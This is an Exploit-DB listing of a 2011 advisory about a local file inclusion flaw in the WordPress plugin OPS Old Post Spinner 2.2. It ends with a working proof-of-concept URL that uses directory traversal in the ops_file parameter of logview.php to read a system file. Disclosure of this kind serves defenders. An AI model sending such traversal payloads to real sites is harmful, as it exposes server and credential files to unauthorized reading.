OPS Old Post Spinner 2.2.1 WordPress Plugin - LFI Vulnerability

2011-02-26T00:00:00
ID EDB-ID:16251
Type exploitdb
Reporter AutoSec Tools
Modified 2011-02-26T00:00:00

Description

OPS Old Post Spinner 2.2.1 Wordpress Plugin - LFI Vulnerability. Webapps exploit for php platform

                                        
                                            Source: http://packetstormsecurity.org/files/view/98751/WordPressOPSOldPostSpinner2.2-lfi.txt

------------------------------------------------------------------------
Software................WordPress OPS Old Post Spinner 2.2
Vulnerability...........Local File Inclusion
Download................http://1manfactory.com/ops
Release Date............2/25/2011
Tested On...............Windows 7 + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------

--Description--

A local file inclusion vulnerability in WordPress OPS Old Post Spinner
2.2 can be exploited to include arbitrary files.


--PoC--
http://localhost/wordpress/wp-content/plugins/old-post-spinner/logview.php?ops_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini